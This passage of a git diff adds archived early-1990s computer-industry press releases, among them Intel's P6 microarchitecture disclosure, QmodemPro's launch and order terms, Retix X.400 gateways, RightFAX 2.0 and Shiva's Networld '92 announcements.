Proprinter III XL. With a suggested retail price +of $2,195, the MTP is available for shipment now. + +Output Technology Corporation is a Spokane, Washington, based printer +manufacturer, and is a leader in laser and impact printing technology, and +laser enhancement products. OUTPUT's products are available worldwide +through an extensive network of distributors, VARs, and OEMs, recently +complemented with the addition of Ingram Micro and Tech Data Corporation. + +OTC - Output Technology Corp +2310 N. Fancher Rd, Spokane, WA 99212-1381 +509-536-0468 800-468-8788 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/p6issc.txt b/textfiles.com/computers/PRESSRELEASE/p6issc.txt new file mode 100644 index 00000000..afcb6fb4 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/p6issc.txt @@ -0,0 +1,93 @@ + +INTEL PRESENTS P6 MICROARCHITECTURE DETAILS +Technical Paper Highlights "Dynamic Execution" Design + +SAN FRANCISCO, Calif., Feb. 16, 1995 -- Intel Corporation today +disclosed details of the first fruit of a parallel engineering effort, +the next-generation P6 microprocessor, at an engineering conference here. +The presentation of technical details follows the delivery of first +working samples to OEMs. + + The 5.5-million transistor chip will deliver the highest level of +processor performance for the Intel Architecture when systems using the chip +begin to ship in the second half of this year. P6 will achieve this +performance using a unique combination of technologies known as Dynamic +Execution. + + P6 microarchitecture details were presented by Intel at the IEEE +International Solid State Circuits Conference (ISSCC), an annual industry +gathering where technical innovations are showcased and discussed. Details +on P6's unique approach to high-performance processing, described collectively +as Dynamic Execution, were presented by Dr. Robert Colwell, P6 architecture +manager, at ISSCC. + + Colwell explained that this architectural enhancement is the next step +beyond the superscalar advance implemented in the Pentium(R) processor. +Dynamic Execution is a combination of technologies -- multiple branch +prediction, data flow analysis and speculative execution -- that is +constantly feeding P6's data-crunching units. Intel engineers were able to +implement Dynamic Execution by analyzing how billions of lines of code in +software programs are typically executed by processors. Collectively, these +technologies allow the P6 to operate as an efficient information factory. + + Multiple branch prediction increases the amount of work available +for the microprocessor to execute. Data flow analysis schedules the +instructions to be executed when ready, independent of the original program +order. Speculative execution allows the P6 to keep its superscalar engine +as busy as possible by executing instructions that are likely to be needed. + + With these technologies, the P6 can efficiently analyze much larger +sections of incoming program flow than any previous PC processor, swiftly +allocate internal resources, and intelligently optimize work that can be +done in parallel. Consequently, more data can be processed in a given time +period. + +Parallel Design Teams Learn From Each Other + + The concept of P6's Dynamic Execution engine began in 1990, when +today's mainstream Pentium(R) processor was still just a software simulation. + + "Intel's use of parallel engineering teams for chip design has +compressed delivery cycles of new generations of chips, cutting the time +about in half," said Albert Yu, senior vice president and general manager, +Microprocessor Products Group. "As a result, computer users will have some +of the most powerful, low-cost engines at hand to enrich the desktop with +software and other capabilities we only imagined five years ago," he said. + + Yu said the Oregon-based P6 design team, building on the knowledge +gained from the Pentium processor design, embarked on an innovative +system-level solution to the next-generation processor involving the +processor, cache (high-speed supporting memory), and bus (the transport +mechanism that keeps data flowing into and out of the processor). "This +approach will ensure that computers built around P6 will be able to take +advantage of the chip's processing power when it is introduced as a +commercial product later this year," he said. + + The system-level approach means the P6 will be the first high-volume +microprocessor with two die in a single package. A dual-cavity, standard +PGA package contains a P6 die and a companion level two (L2) cache die. +The two chips communicate using a highly-optimized bus which contributes +to high performance by tightly-coupling the processor to its primary +data source. + +Additional Features + + In addition to providing new levels of performance, the P6 will contain +new features which will greatly simplify the design of multiprocessor systems +and improve overall system reliability. Among applications that will benefit +greatly from this processing power are: desktop applications such as image +processing, speech recognition, software-only videoconferencing and +multimedia authoring, and server applications such as transaction and +database processing. + + At introduction in the second half of this year, the P6 processor +will operate at 133 MHz and will use a power supply of 2.9 volts. The +low voltage also contributes to low power dissipation, which is expected +to be only about 14 watts, typically, for the processor and L2 cache combined. +Complete performance and power dissipation information will also be available +at that time, although estimated performance has been measured at more than +200 SPECint92 on a prototype system, twice the performance of today's fastest +Pentium processor. + + Intel, the world's largest chip maker, is also a leading manufacturer +of personal computer, networking and communications products. diff --git a/textfiles.com/computers/PRESSRELEASE/qmailmhs.txt b/textfiles.com/computers/PRESSRELEASE/qmailmhs.txt new file mode 100644 index 00000000..50ae3134 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/qmailmhs.txt @@ -0,0 +1,54 @@ +WEST DES MOINES, IOWA FEBRUARY 7, 1992 -- CESOFTWARE HOLDINGS, INC. +(NASDAQ/HMS Symbol: CESH) today announced QuickMail for MHS (Message +Handling Services). QuickMail for MHS will allow the more than two million +users attached to Novell networks, utilizing NetWare MHS, similar +functionality and flexibility already enjoyed by nearly half a million +QuickMail users worldwide. MacWeek recently estimated that NetWare MHS is +the messaging engine for about 65% of the PC mail market. The NetWare MHS +end-users' experience will be enhanced by the full featured, easy-to-use +QuickMail interface and the comprehensive services offered by NetWare +MHS. + +Kanwal Rekhi, Executive Vice President of Novell and General Manager of the +Interoperability Systems Group said, "We are very excited that CE Software +is developing their market-leading E-mail package, QuickMail, to run +natively with NetWare MHS. Our customers have been asking for native +NetWare MHS support for the Macintosh and now users of QuickMail for MHS +will gain transparent access to the more than 120 commercial applications +which use NetWare MHS." + +"We are pleased to announce our strategic support of MHS," said Richard +Skeie, President and CEO of CE Software, Inc. "As we strive to improve our +customers' computing environments, it's a natural progression for +QuickMail to support NetWare MHS. NetWare users should benefit handsomely +from the combination of QuickMail functionality and Novell NetWare MHS +services." + +CE Software will be demonstrating a version of QuickMail for MHS in the +Novell booth at NetWorld, held in Boston, February 11-13. Product +availability will be announced at a later date. + +CE Software is the leading supplier of electronic mail for the Macintosh +market. QuickMail also supports Windows, DOS and OS/2. CE's other major +products include In/Out, an electronic people tracker for networked +computers; QuicKeys 2, the award-winning macro program; DiskTop, a +sophisticated file management utility; Alarming Events, a personal +scheduling application; Tiles, the Intelligent Desktop for Apple +Macintosh; and CalendarMaker, a popular calendar publishing application +for Macintosh and Windows. + +CE Software +1801 Industrial Circle, PO Box 65580 +West Des Moines, IA 50265 +515-224-1995 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/qmpro.txt b/textfiles.com/computers/PRESSRELEASE/qmpro.txt new file mode 100644 index 00000000..04f840b9 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/qmpro.txt @@ -0,0 +1,194 @@ + + Mustang Software, Inc. Introduces QmodemPro + + BAKERSFIELD, Calif., October 13, 1992 -- Mustang Software, Inc. +(MSI), has introduced QmodemPro, the first communications software +program enabling electronic mail messages to be received and answered +using one integrated program, regardless of the originating E-mail +source. + + QmodemPro retrieves E-mail, bringing it in to one PC/compatible +environment. The user no longer needs separate programs to handle MCI +Mail, CompuServe E-mail, BBS messages and other E-mail systems. In +addition, QmodemPro can redirect the user's replies to any bulletin +board system (BBS), E-mail service or FAX machine -- not just the +original message's source. + + QmodemPro represents a "rewrite from scratch" of the Qmodem +program, according to Jim Harrer, president/CEO of MSI. The company +acquired the original Qmodem program from The Forbin Project, Cedar +Falls, Iowa, in October 1991. The product had attracted a large user +following through its nearly seven years of availability as a shareware +product. + + "Our goal for Qmodem has always been to produce an outstanding, +mass-merchandized product that could compete on any retail shelf with +the major generic communications programs," Harrer said. "In addition, +QmodemPro works hand-in-glove with our other retail product line, the +WILDCAT! BBS software." + +Enhanced Off-Line Xpress Mail Reader Heads New Features + + QmodemPro offers more than 75 new features compared to Qmodem +Version 5, the first version of Qmodem sold under the MSI label, +unveiled this past January. Heading the list of new features is an +enhanced off-line mail reader. This capability allows users to +download packets of mail and then read the contents off-line, +significantly reducing expensive long-distance charges. + + The enhanced off-line mail reader OLX features full mouse support +with pull-down menus and resizable windows. Other new features include: + +* Ability to open multiple packets and view multiple conferences at + once. + +* No limitations to the size of packets, conferences or message size. + +* More efficient use of memory resources, including EMS and XMS. + +* An integrated message editor with spelling checker and 124,000 word + dictionary. External editors also supported. + +* Full cut, copy and paste between messages, conferences and replies, + even across packets. + +* Ability to save messages to folders for reading and action at a + later time. + +* Internal address book with full links via QmodemPro to CIS, MCI, + FAX and other services. + +* Advanced personal mail handling via an IN BOX with automatic + archiving and configurable purging. Personal mail no longer + disappears when a packet is deleted. + +* Redirection of replies and messages to any location, not just the + original source system. + +Full mouse support and a pull-down menu interface have also been added +throughout the QmodemPro program. Other key new features of the +communications software include: + +* The dialing directory now supports up to 4,095 entries per + telephone book, with an unlimited number of books. + +* Ideally suited for working with a BBS, the dialing directory + now includes support for up to four alternate telephone numbers + per entry. This allows the user to automatically try a + different telephone number if the primary BBS number is busy. + +* Group-dialing support allows users to group-dial telephone book + entries as one entry. When dialing multiple E-mail systems, + QmodemPro will download mail from one system and automatically + continue on to the next entry in the group. + +* Automatic linking between mail packets created in OLX and dialing + directory entries. This allows sending all pending replies with a + single keystroke. + +* QmodemPro includes send FAX ability, supporting both ASCII and .PCX + files through any Class 1 or Class 2 FAX modem. FAX send + integrates with OLX completely making it possible to create and + send a FAX and custom cover sheet by simply typing the message to + send. + +* MCI Mail and CompuServe E-mail gateway support, enabling users + to retrieve or send messages on these popular E-mail accounts. + +* 125 pre-configured modem setups for fast installation. + + Xmodem and ASCII. Up to 10 external protocols can be added, + including bi-directional protocols such as BIMODEM and HSLINK. + +* Five new terminal emulations have also been added, including + WYSE 50, DEC VT 102, 220, 320 and TVI 925. + +Direct orders for QmodemPro are being taken effective 10/13/92. A +specific release date cannot be announced since the manuals and +packaging are still in production. + +The retail price for QmodemPro with Off-Line Xpress is $99, and it will +be available in retail outlets in 6-8 weeks. Orders placed with MSI +direct will be processed as soon as the packaging is complete. Allow +6-8 week for delivery for all orders. Orders will be shipped on a +first-in first-out basis. + +There are several special offers available. Review the section below +for details. Should an individual be eligible for more than one offer, +we encourage you to order the one which gives the best pricing +advantage. Only one special price offer is available per registration. + + * A special upgrade offer for only $35 + s/h is available to + registered users of Qmodem v5.x, and to users of Qmodem 4.x + purchased from the Forbin project. In order to take advantage + of this upgrade offer your registration card must be on file + with MSI or your name and registration information must be on + file in the database of purchasers from the Forbin project. + + * A special offer is also being extended to registered WILDCAT! + sysops for a limited time. Until December 31, 1992 any WILDCAT! + sysop can purchase QmodemPro for only $50 + s/h, a discount of + almost 50%. If you don't own WILDCAT! but want to get it, you + can order WILDCAT! between now and December 31 and get QmodemPro + at the discount. + +Because the new OLX v3 integrates so well with QmodemPro and has +extra capabilities when used with QmodemPro (such as FAX, CIS, MCI +etc.), we are also extending special offers to registered users of the +OLX and SLMR products. + + * Registered users of OLX v2.2 will be receiving the new OLX v3 + automatically, provided the registration card has been received + at MSI. A special offer is also being extended to these OLX + registered users to enable them to receive the full QmodemPro + package (including OLX) for only $20 + s/h. To take advantage + of this offer you must place your order by phone with MSI prior + to November 1, 1992! This offer is not good after the free OLX + update has been mailed. You must place your order prior to + November 1 so that we can change our system records before we + ship your package. After that date you can take a credit for $40 + toward a purchase of QmodemPro (see last offer). + + * Registered users of the SLMR program from Technique Computer + Systems can upgrade to OLX v3 for $20 + s/h. They may also + purchase QmodemPro with OLX for $40 + s/h if desired. This + offer expires on December 31, 1992. + + * Registered users of either OLX 2.2 or SLMR may upgrade to + QmodemPro at any time by taking a credit of their purchase price + ($40 for OLX 2.2 and $20 for SLMR) against the $99 QmodemPro + price. + + +Shipping and handling charges for all orders are as follows: + + Continental U.S. - $10 + Hawaii, Alaska & Canada - $15 + Overseas - $35 + + Add $5 for all COD orders. CODs must be paid by cashiers check + or money order, no personal checks or cash. + +Orders are shipped exclusively by Federal Express. + + +Orders can be placed as follows: + + * Call 1-800-999-9619 to order via VISA, MC, AMEX, Discover or COD. + + * Order via FAX by calling 805-395-0713. Please indicate your + full shipping address, the name of the product desired, and + registration information if taking advantage of an update + discount. Also include a daytime phone number for use in the + event we need to contact you about your order. + + * Mail your order information to us at P.O. Box 2264, Bakersfield, + CA 93303. Please indicate your full shipping address, the name + of the product desired, and registration information if taking + advantage of an update discount. Also include a daytime phone number fo + event we need to contact you about your order. + + * Order via our BBS by calling 805-395-0650 (non-registered lines) + or 805-395-0250 (registered lines). + + diff --git a/textfiles.com/computers/PRESSRELEASE/retixmac.txt b/textfiles.com/computers/PRESSRELEASE/retixmac.txt new file mode 100644 index 00000000..71b1bb11 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/retixmac.txt @@ -0,0 +1,39 @@ +Santa Monica, CA, January 6, 1992 -- Retix, a leading worldwide supplier of +Open Networking products, today announced that it has begun shipments of +its Microsoft Mail for Macintosh Gateway to X.400. The gateway provides +Microsoft Mail (MS Mail) users with direct access to X.400 network users +worldwide. + +The MS Mail Gateway links users of MS Mail for the Macintosh to users of +other leading LAN-based electronic mail (e-mail) products, mainframe and +mini-computer based e-mail systems and public and private X.400 services. +The gateway works in conjunction with Retix' OpenServer 400 to provide MS +Mail-to-X.400 file conversion and transmission facilities. Using the +standard X.400 data format, messages can be exchanged between otherwise +incompatible e-mail programs, regardless of the computing platform. + +Pricing for the gateway begins at $1,795, U.S. list. For more information, +contact Retix Inside Sales at 1-800-255-2333 or 310-828-3400. + +Retix is a leading worldwide supplier of Open Networking products to the +end user and OEM markets. Founded in 1985, Retix designs, manufactures and +markets both OSI software and internetworking bridges and routers to end +users, OEMs, systems integrators, value-added resellers and distributors. +Retix has more than 200 OSI original equipment manufacturer (OEM) +licensees throughout the world and has sold over 20,000 bridges and +routers. Retix' shares are traded on the NASDAQ National Market System +under the symbol "RETX". + +Retix, 2401 Colorado Ave, Santa Monica, CA 90404 +310-828-3400 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/retixos2.txt b/textfiles.com/computers/PRESSRELEASE/retixos2.txt new file mode 100644 index 00000000..d91a2221 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/retixos2.txt @@ -0,0 +1,108 @@ +Santa Monica, CA, February 5, 1992 -- Retix, a leading worldwide supplier +of Open Networking products, today expanded its OpenServer 400 series of +X.400 based messaging solutions with a new version of OpenServer 400 and +two additional gateway Products. The company has added an OS/2 version to +its current line of popular OpenServer 400 products which includes +versions for DOS and UNIX (both SCO and Interactive versions). In +addition, Retix has introduced a new Microsoft Mail for PC Networks +Gateway to X400 and a new version of the SMTP (Simple Mail Transfer +Protocol) Gateway to X.400, expanding its current suite of gateway +products. Now, users in each of the major operating system environments, +using virtually any e-mail system, can benefit from OpenServer 400's +messaging solution. + +The OpenServer 400 Product Family + +Retix OpenServer 400 products allow users to link otherwise incompatible +mail systems to one another, creating a cohesive, enterprise-wide +messaging environment. All OpenServer 400 products provide a distributed +solution based on widely-accepted industry and ISO international +standards. In addition, OpenServer 400 products can be combined with an +extensive suite of gateways from Retix and other vendors to gain access to +virtually every popular e-mail and mail-enabled application in use today. +OpenServer 400 for OS/2 + +OpenServer 400 for OS/2 is designed to take full advantage of the +multi-tasking OS/2 Version 1.3 operating system, providing users with +improved performance and increased capacity for their enterprise-wide +messaging networks. Key benefits of the OS/2 version include: better +memory utilization and increased performance for more efficient service to +large numbers of users; the ability to run OpenServer 400 and selected +e-mail server applications on a single machine; and a graphical OpenServer +Configuration Utility (OCU) running under Presentation Manager that +simplifies configuration and set-up. + +"Now that we have a version of OpenServer 400 for OS/2, as well as DOS and +UNIX, we can address the full spectrum of users that need to establish +enterprise-wide messaging," said Mark Fishburn, vice president and general +manager of Retix' OSI Product Unit. + +New Gateway Products + +Retix also expanded its family of gateways which work in conjunction with +OpenServer 400 to give users of PC LAN-based e-mail systems +interoperability with a wide range of other e-mail systems, mainframe and +minicomputer based systems and public mail networks that support X.400. + +The new Microsoft (MS) Mail for PC Networks Gateway provides MS +Mail-to-X.400 format conversion and transmission, allowing users of MS +Mail for PC Networks (formerly Consumer Software's Network Courier e-mail +package) to send messages and receive messages from users of other e-mail +systems. In fact, to the MS Mail user, users of other email systems appear +as if they were using the same mail system; the gateway simply maps the MS +Mail address to the X.400 address transparently. + +The Retix SMTP Gateway to X.400 works in a similar fashion, providing +SMTP-to-X.400 format conversion and transmission facilities, so that users +of UNIX e-mail systems (RFC 822 mailers) obtain access to other e-mail +systems and mail networks. Using the SMTP Gateway in combination with +OpenServer 400, users can send messages or files throughout an enterprise +using any e-mail package that supports RFC 822. The new version of the +gateway announced today adds support for SCO UNIX (to the previously +supported Interactive version), as well as MMDF-II, a popular SCO UNIX +mailer. + +"Microsoft has a significant market share in the LAN-based e-mail world +with MS Mail for PC Networks, and UNIX mailers are used heavily in both +government and academic sectors," said James Neiser, associate vice +president of marketing for the Retix OSI Product Unit. "In conjunction +with our OpenServer Partners, we can now provide X.400-based +interoperability to e-mail users in virtually every market sector." + +The MS Mail for PC Networks and SMTP Gateways to X.400 join the growing +number of gateways supplied by Retix and its OpenServer Partners to +provide access to popular e-mail and mail-enabled applications. Additional +gateways to X.400 are currently available for users of 3Com, cc:Mail, +NetWare MHS, OfficeWorks, MS Mail for Macintosh and WordPerfect, among +others. + +Pricing and Availability + +OpenServer for OS/2 is available 60 days ARO and begins at $5,950, U.S. +list. The Microsoft Mail for PC Networks Gateway to X.400 and the new +version of the SMTP Gateway to X.400 are available 60 days ARO. Pricing +for both gateways begins at $1,795, U.S. list. The products will be +demonstrated, along with OpenServer 400, at Networld Boston, February +11-13,1992 in Boston, Massachusetts, booth 121. + +Retix is a leading worldwide supplier of Open Networking products to the +end user and OEM markets. Founded in 1985, Retix designs, manufactures and +markets both OSI software and internetworking bridges and routers to end +users, OEMs, systems integrators, value-added resellers and distributors. +Retix has more than 200 OSI OEM licensees throughout the world and has +sold over 25,000 bridges and routers. Retix' shares are traded on the +NASDAQ National Market System under the symbol "RETX". + +Retix, 2401 Colorado Ave, Santa Monica, CA 90404 +310-828-3400 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/rightfax.txt b/textfiles.com/computers/PRESSRELEASE/rightfax.txt new file mode 100644 index 00000000..811aa5b1 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/rightfax.txt @@ -0,0 +1,55 @@ +February 11, 1992, Boston, MA. Cracchiolo & Feder, Inc. today announced the +release of RightFAX 2.0, a totally rewritten version of it's network fax +solution. RightFAX 2.0 incorporates the benefits of client-server +technology and a Windows 3.0 and 3.1 front-end -- improving performance +and reducing support problems. "RightFAX 2.0 has been redesigned using +more client-server technology than previous versions to provide a more +robust solution for today' s demanding networks," said Bradley Feder, +President of Cracchiolo & Feder, Inc. + +RightFAX 2.0 now supports a variety of fax boards including the Brooktrout +TR-112 series and the Gammalink CP series. "Faxing is critical for +communicating overseas. RightFAX' s support of these boards provides for +more international connections, and the Gammalink CP-MC board addresses +the needs of the MicroChannel market which adds depth to the RightFAX +product line," said Joseph Cracchiolo, Vice President of R&D. RightFAX 2.0 +also includes additional international character set support. + +RightFAX 2.0 is a multi-channel network fax utility product that allows PC +clients to send and receive fax documents from their network workstation. +Outgoing documents can be faxed by printing them to a standard network +print queue from any software application package. As for incoming faxes, +RightFAX offers several routing options including Direct-Inward-Dial. The +new version adds support of DTMF codes which enables callers to route +faxes with tone or voice prompts. RightFAX 2.0's DTMF routing technology +can also be configured to interface with PBX systems. + +Supporting NetWare, LAN Manager and OS/2 LAN Server, RightFAX 2.0 added a +new Windows fax viewer which allows documents to be scaled, flipped, and +edited in graphics mode. A new NetWare version of RightFAX utilizes an +OS/2 based fax server for increased throughput. A NetWare fax server now +supports up to 32 print queues on 32 file servers, supports up to 16 phone +lines or a maximum of 8 fax boards, and services Windows, DOS, & OS/2 +clients/workstations. + +Based in Tucson, Arizona, Cracchiolo & Feder is a network integrator and +developer of high-technology network FAX solutions. RightFAX is the only +multichannel, auto-routing fax Server solution which requires no +workstation TSR memory. RightFAX 2.0 is scheduled to ship March 1, 1992 +through a network of distributors, VARs and system integrators. Prices +range from $1,995 (US) to $4,495 (US). The entire RightFAX product line +will be exhibited at NetWorld/Boston (booth #4825) and CeBIT in Hannover, +Germany (Hall #12, USA Pavilion, Stand A48/C47, Booth C6). For more +information, please contact Cracchiolo & Feder, Inc. at (602) 327-1357 or +FAX at (602) 795-4753. + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/shiva.txt b/textfiles.com/computers/PRESSRELEASE/shiva.txt new file mode 100644 index 00000000..cd35b4c9 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/shiva.txt @@ -0,0 +1,206 @@ +Shiva at Networld '92 +Shiva Joins Novell Technical Support Alliance + +At Networld, Shiva Corporation will announce joining Novell, Inc., and +other computer industry leaders as a member of the Technical Support +Alliance (TSA), which gives customers coordinated post-sales support for +multivendor computing environments. Novell's choice of Shiva as a +technical alliance partner was a result of an extensive survey of the +large NetWare user base. TSA members include 30 leading companies such as +Apple, Borland, Digital Equipment Corporation, Microsoft and others. For +more details, see the enclosed press release. + +Network Discussion Groups + +Throughout the show, Shiva will host a series of discussion groups on +issues surrounding dial-in network access. The groups of network managers +-over 100 in all will air their views, led by Dr. Eric Almquist, general +manager of Decision Research Corporation and Lori Underhill, also of DRC. +To keep the ideas flowing, Shiva also invited industry experts who will +act as discussion catalysts. For information about trends that emerge in +the discussion groups, contact Criswell Communications after Networld. + +Shiva Booth Demonstrations + +Shiva Corporation (booth #3624) will demonstrate a variety of dial-in +solutions for PC and Macintosh vendor environments, along with its popular +FastPath 5 LocalTalk-to-Ethernet router. + +NetModem/E + +Shiva will demonstrate the award-winning NetModem/E, the only dial-in +networking product that gives PC users transparent access to Novell +NetWare network data and services, even using graphical programs like +Lotus Notes and Windows. The NetModem/E supports Novell's IPX and +AppleTalk, so PC and Macintosh users can dial into a network and access +resources as if they were local nodes. Other features include shared +dial-out and network-to-network routing. + +The demonstration setup in Shiva's booth includes NetWare 3.11 running on a +Compaq 386-33 computer along with the Mac NLM (NetWare Loadable Module). +The network, based on a 10BaseT Ethernet topology, connects two Compaq +workstations, a Macintosh IIsi, and Apple Computer's PowerBook. Both PCs +and Macintosh computers can dial out to outside services and dial into the +Shiva network in Cambridge, MA, through a NetModem/E. The NetModem/E uses +Shiva's dial-in driver, which is compatible with the ODI (Open Data Link +Interface) specification from Novell. The workstations can all dial out +through a single NetModem/E to Shiva's bulletin board or CompuServe, or +dial into a NetModem at Shiva for network-to-network routing. + +FastPath 5 + +Shiva's FastPath 5, the fastest LocalTalk-Ethernet gateway, and the de +facto standard for Macintosh routing, will also be demonstrated with +Shiva's new routing software, called K-Star 9.1, that is faster and uses +less memory than previous versions. K-Star 9.1 adds more support for SNMP, +including support for 311 unique MIB objects. Version 2.2.1 of Shiva Net +Manager, including a new management interface and enhanced diagnostics, +will also be demonstrated. The Shiva Net Manager lets users manage all +their FastPaths from anywhere on the internet. + +AppleTalk Remote Access Technology Demonstration + +Shiva is showing one of the first third-party demonstrations of AppleTalk +Remote Access. The demonstration setup includes an Apple PowerBook running +System 7 and AppleTalk Remote Access client software, a 9600 bps modem, +and a Shiva hardware server and modem connected to an AppleTalk network. +Using AppleTalk Remote Access and the modem, the remote PowerBook dials +and connects to the Shiva server, and becomes a full node on the AppleTalk +network. The PowerBook user can access file servers, printers, or +electronic mail, as if he or she were directly connected to the network. + +User Champions + +Shiva salutes its User Champions from Polaroid Corporation, McDonald's and +others in its booth presentation. Polaroid Corporation uses the NetModem/E +in an automated identification system that stores digitized photographs, +fingerprints and data on a central server. Clients in remote locations can +access identification data using the NetModem/E - a transparent, easy +solution. McDonald's Corporation also uses the NetModem/E, to give +regional managers in remote offices access to central databases from +anywhere. + +Expanded Management Team + +New management joining Shiva during the last two quarters include Bill +Avery, VP-Product Development; Paul Chesterman, VP-Finance; Steve Van +Beaver, Director of Customer Support; Ronna Alintuck, Director of +Marketing. For more information, see the enclosed release. + +About Shiva Corporation + +Founded in 1985, Shiva Corporation is a leading supplier of communications +servers and internetworking products. According to International Data +Corporation (Framingham, MA), Shiva is the leading AppleTalk +internetworking vendor, with 56% of the market. + +NetModem/E is a trademark of Shiva Corporation. FastPath is a registered +Trademark of Novell, licensed to Shiva Corporation. All other product +names are registered trademarks or trademarks of their respective +companies. + +-------------------------------------------------------- + +Boston, MA, Networld -- February 11, 1992 -- Today Shiva Corporation joined +Novell, Inc., and other computer industry leaders as a member of the +Technical Support Alliance (TSA), formed to provide customers with +coordinated post-sales support for multivendor computing environments. + +Novell's choice of Shiva as technical alliance partner was a result of an +extensive survey of the large NetWare user base. Shiva was recognized as a +leading supplier of internetworking and dial-in remote access tools for +Novell customers. Shiva is the only Macintosh hardware product company, +other than Apple Computer Corp., currently in the Alliance. + +TSA members include computer industry leaders such as Apple, Borland, +Compaq, Digital Equipment Corp., Hewlett-Packard, IBM, Intel, Lotus +Development Corp., Microsoft, NetFRAME, Oracle, Ungermann Bass, 3Com and +others. The TSA now includes 30 member companies. + +According to Richard King, Novell's Vice President of Service and Support, +"With companies like Shiva joining the alliance, TSA will continue to +provide the widest support coverage for complex, multivendor systems in +the industry." + +The Technical Support Alliance agreement between Novell and Shiva outlines +the responsibilities of a support team that includes technical support +staff from both companies. Team members exchange training and technical +information on their respective products and use each other's products in +their technical support labs. A customer with a technical problem +involving both companies can call either company to begin resolution of +the problem. Procedures that involve a conference call between team +members are defined for problems that require escalation. + +Steve Van Beaver, Shiva's Director of Product Support, said "Our +participation in TSA reflects the fact that internetworking tools, and +dial-in remote access, are becoming network critical applications. As +users link multi-platform and multi-protocol environments, tools like +routers and Shiva's NetModem become virtually as central as the network +operating system." + +The NetModem/E is an integrated network communications server that provides +remote IBM and compatible PCs and Macintosh computers with transparent, +secure access to NetWare and AppleTalk Ethernet networks. The NetModem/E +provides dial-in, shared dial-out, and network-to-network routing for +PC-only networks, Macintosh-only networks, and mixed networks. + +Shiva's FastPath 5, the leading LocalTalk-Ethernet gateway, and NetModem/E, +a network communications server for Macintosh and PC users, are both +widely used to integrate Macintosh computers into Novell NetWare +environments. The FastPath 5 is a multi-protocol LocalTalk-Ethernet +gateway that routes AppleTalk Phase 1 and 2, TCP/IP, DECnet, IPTalk and +NFS. It is the de facto standard for AppleTalk to Ethernet routing, with +an estimated 80 percent of the market. + +Shiva's Dramatic Growth Results in Major Support Focus + +Shiva, recently recognized as 1 8th on the Inc. 500 list of fastest growing +companies, has increased its support staff by over 50% during the last +year. Senior technical support people have been added to the team, +increasing the bandwidth and quality of the support. The company has also +put a sophisticated call tracking system in place. + +According to Van Beaver, "Shiva has implemented an automated call tracking +system based on Informix that allows us to create a life history of every +customer who calls us. It saves both us and our customers valuable time as +we help solve their problems. Perhaps more important, it provides feedback +to the entire company about what customers are saying to us." + +Since joining the company, Van Beaver has also introduced a customer +awareness program. As part of the program, every Shiva manager visits or +phones several accounts each week, requesting feedback on product quality, +application use, and the customer's overall satisfaction. + +Turnaround time is a priority, since networks play a mission-critical role +in the corporate infrastructure. Said Van Beaver, "We've reduced our +response time drastically. If a customer calls Shiva, they can feel secure +that they'll talk with a support technician right away. And if we don't +meet those expectations, we want to know!" Van Beaver previously managed +product support at Intersolv (formerly Index Technology), where the +telephone support group received the best rating in the CASE industry for +three years running. He manages worldwide support, training and repair for +Shiva's products. + +About Shiva + +Shiva Corporation is a leading supplier of dial-in remote access, and +internetworking tools for Novell, AppleTalk, or mixed networks. Shiva +products have won critical acclaim for their easy to use peripheral +sharing, remote access and local- and wide-area network routing. According +to market research firm International Data Corporation, Shiva Corporation +is the leading supplier of AppleTalk internetworking systems with 56.1% of +the market. + +Shiva Corp, One Cambridge Center, Cambridge, MA 02142 +617-252-6300 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/smc.txt b/textfiles.com/computers/PRESSRELEASE/smc.txt new 